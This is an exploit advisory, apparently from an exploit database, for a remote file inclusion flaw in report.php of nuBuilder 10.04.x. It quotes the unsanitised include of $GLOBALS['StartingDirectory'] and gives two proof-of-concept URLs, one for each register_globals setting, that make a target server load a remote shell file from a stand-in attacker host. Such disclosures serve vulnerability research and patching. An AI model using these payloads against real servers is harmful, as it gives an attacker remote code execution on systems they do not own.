nuBuilder - Remote File Inclusion

Author: Ahlspiess
type: webapps
platform: php
port: 
date_added: 2010-07-28 
date_updated: 2010-07-28 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Software: nuBuilder 10.04.x and lower(maybe)?
Type: Remote File Inclusion
Download: http://sourceforge.net/projects/nubuilder/files/
Author: Ahlspiess
Email: ahlspiess@tbdsecurity.com

Vulnerable file: report.php

report.php file content
1 	<?php
2 	/*
3 	** File: report.php
4 	** Author: nuSoftware
5 	** Created: 2007/04/26
6 	** Last modified: 2009/07/15
7 	**
8 	** Copyright 2004, 2005, 2006, 2007, 2008, 2009 nuSoftware
9 	**
10 	** This file is part of the nuBuilder source package and is licensed under the
11 	** GPLv3. For support on developing in nuBuilder, please visit the nuBuilder
12 	** wiki and forums. For details on contributing a patch for nuBuilder, please
13 	** visit the `Project Contributions' forum.
14 	**
15 	** Website: http://www.nubuilder.com
16 	** Wiki: http://wiki.nubuilder.com
17 	** Forums: http://forums.nubuilder.com
18 	*/
19
20 	include($GLOBALS['StartingDirectory']."/database.php");  <== interesting huh?

POC
Succesfully tested against php config register_global = On and Off, allow_url_include = On

register_global = Off
http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?

register_global = On
http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?


#EOF